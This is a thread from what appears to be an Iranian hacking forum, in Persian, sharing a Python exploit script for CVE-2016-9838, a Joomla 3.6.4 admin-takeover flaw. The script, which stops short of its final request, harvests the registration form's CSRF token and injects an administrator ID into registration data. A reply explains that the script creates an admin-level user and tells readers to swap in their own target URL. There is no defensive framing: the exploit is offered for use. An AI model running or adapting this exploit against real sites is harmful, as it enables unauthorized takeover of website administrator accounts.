انجمن تیم امنیتی ایران سایبر

Security Joomla V3.6.4 Admin Takeover

شروع موضوع توسط root_off ‏2/2/17 در انجمن Vulnerability Laboratory

  1. لطفا فایل های خود را جهت ماندگاری در انجمن اپلود کنید در صورت مشاهده لینک اپلود خروجی , تاپیک حذف خواهد شد .
    بستن اطلاعیه
بستن اطلاعیه


درود مهمان گرامي؛

مهمان گرامي، براي مشاهده تالار با امکانات کامل ميبايست از طريق ايــن ليـــنک ثبت نام کنيد .

حامی مسابقات و برگزار کننده دوره های پیشرفته ارزیابی امنیت برای سازمان ها فتح پرچم (CTF)
برچسب ها:
  1. root_off
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏29/1/17
    ارسال ها:
    1
    تشکر شده:
    7
    جنسیت:
    شغل:
    Student
    محل سکونت:
    Mazandaran _ Neka
    Name:
    ABOLFAZL
    Main os:
    Ubuntu
    کد:
    #!/usr/bin/python3
    # CVE-2016-9838: Joomla! <= 3.6.4 Admin TakeOver
    # cf
    
    import bs4
    import requests
    import random
    
    
    ADMIN_ID = 384
    url = 'http://vmweb.lan/Joomla-3.6.4/'
    
    form_url = url + 'index.php/component/users/?view=registration'
    action_url = url + 'index.php/component/users/?task=registration.register'
    
    username = 'user%d' % random.randrange(1000, 10000)
    email = username + '@yopmail.com'
    password = 'ActualRandomChimpanzee123'
    
    user_data = {
    'name': username,
    'username': username,
    'password1': password,
    'password2': password + 'XXXinvalid',
    'email1': email,
    'email2': email,
    'id': '%d' % ADMIN_ID
    }
    
    session = requests.Session()
    
    # Grab original data from the form, including the CSRF token
    
    response = session.get(form_url)
    soup = bs4.BeautifulSoup(response.text, 'lxml')
    
    form = soup.find('form', id='member-registration')
    data = {e['name']: e['value'] for e in form.find_all('input')}
    
    # Build our modified data array
    
    user_data = {'jform[%s]' % k: v for k, v in user_data.items()}
    data.update(user_data)
    
    # First request will get denied because the two passwords are mismatched
    
    response = session.post(action_url, data=data)
    
    # The second will work
    
    data['jform[password2]'] = data['jform[password1]']
     
    Danger BoY، Mr_Security، F4LL3N و 4 نفر دیگر از این ارسال تشکر کرده اند.
  2. new-god
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏21/9/17
    ارسال ها:
    24
    تشکر شده:
    49
    Name:
    mohem
    Main os:
    Kali
    اگه میشه یه توضیح در باره کار با کد بنویسید ممنون
     
  3. JOK3R

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏22/10/14
    ارسال ها:
    443
    تشکر شده:
    2,092
    جنسیت:
    محل سکونت:
    dreams
    Name:
    james
    Main os:
    Windows
    سلام و درود


    این آسیب پذیری برای ساخت یک یوزر با سطح دسترسی Admin هست


    برای استفاده کافیه در خط 11 به جای Url تارگت خودتون را وارد کنید

    PHP:
    url 'http://target.com/' #  target ra vard konid

    AutoExploiter این آسیب پذیری در بخش Vip قرار داده شده است
     
    majidnew، Sir.h4m1D، F4LL3N و 4 نفر دیگر از این ارسال تشکر کرده اند.
بارگذاری...

کاربرانی که از تاپیک دیدن کرده اند (کل: 6)

  1. teagfogue
  2. Enetpropo
  3. DawnInAllah
  4. Juaninator
  5. hackerman1
  6. Ruiner
به انجمن تخصصی امنیت ایران سایبر خوش آمدید . برای مشاهده تمامی تالار ها و امکانات ثبت نام کنید .